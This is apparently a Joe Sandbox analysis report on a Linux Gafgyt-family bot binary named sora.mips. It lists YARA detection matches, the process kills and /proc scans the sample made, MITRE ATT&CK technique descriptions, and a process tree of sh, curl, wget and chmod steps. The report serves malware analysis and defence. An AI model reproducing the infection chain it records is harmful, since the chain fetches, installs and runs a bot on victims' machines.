Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Source: /usr/bin/sora.mips (PID: 6220)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6189, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6190, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6229, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6414)	SIGKILL sent: pid: 6412, result: successful	Jump to behavior

Source: /usr/bin/sora.mips (PID: 6220)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6189, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6190, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6229, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6414)	SIGKILL sent: pid: 6412, result: successful	Jump to behavior

Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6221, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: /bin/sh (PID: 6213)	Directory: /usr/bin/.			Jump to behavior
Source: /usr/bin/curl (PID: 6214)	Directory: /root/.curlrc			Jump to behavior

Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/491/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/793/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/772/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/796/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/774/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/797/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/777/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/799/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/658/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/936/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/785/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/720/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/721/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/788/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/789/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/800/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/801/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/847/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/904/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4331/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2033/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2033/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1582/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1582/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2275/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/3088/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6190/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6190/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1612/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1579/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1579/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1699/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1698/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2028/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1576/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1576/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2302/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2302/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/3236/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2025/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2146/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/910/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4444/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4445/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4446/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6229/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/517/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4447/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2307/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2307/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1594/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1594/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2285/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2285/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2281/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2281/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1349/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1349/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1623/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1622/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1983/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2038/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2038/exe	Jump to behavior

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/usr/bin/sora.mips

Static File Info

Network Behavior

System Behavior

Analysis Process: sh PID: 6213, Parent PID: 6127

General

Chronological Activities

Analysis Process: sh PID: 6214, Parent PID: 6213

General

Chronological Activities

Analysis Process: curl PID: 6214, Parent PID: 6213

General

Chronological Activities

Analysis Process: sh PID: 6216, Parent PID: 6213

General

Chronological Activities

Analysis Process: wget PID: 6216, Parent PID: 6213

General

Chronological Activities

Analysis Process: sh PID: 6217, Parent PID: 6213

General

Chronological Activities

Analysis Process: chmod PID: 6217, Parent PID: 6213

General

Chronological Activities

Analysis Process: sh PID: 6218, Parent PID: 6213

General

Chronological Activities

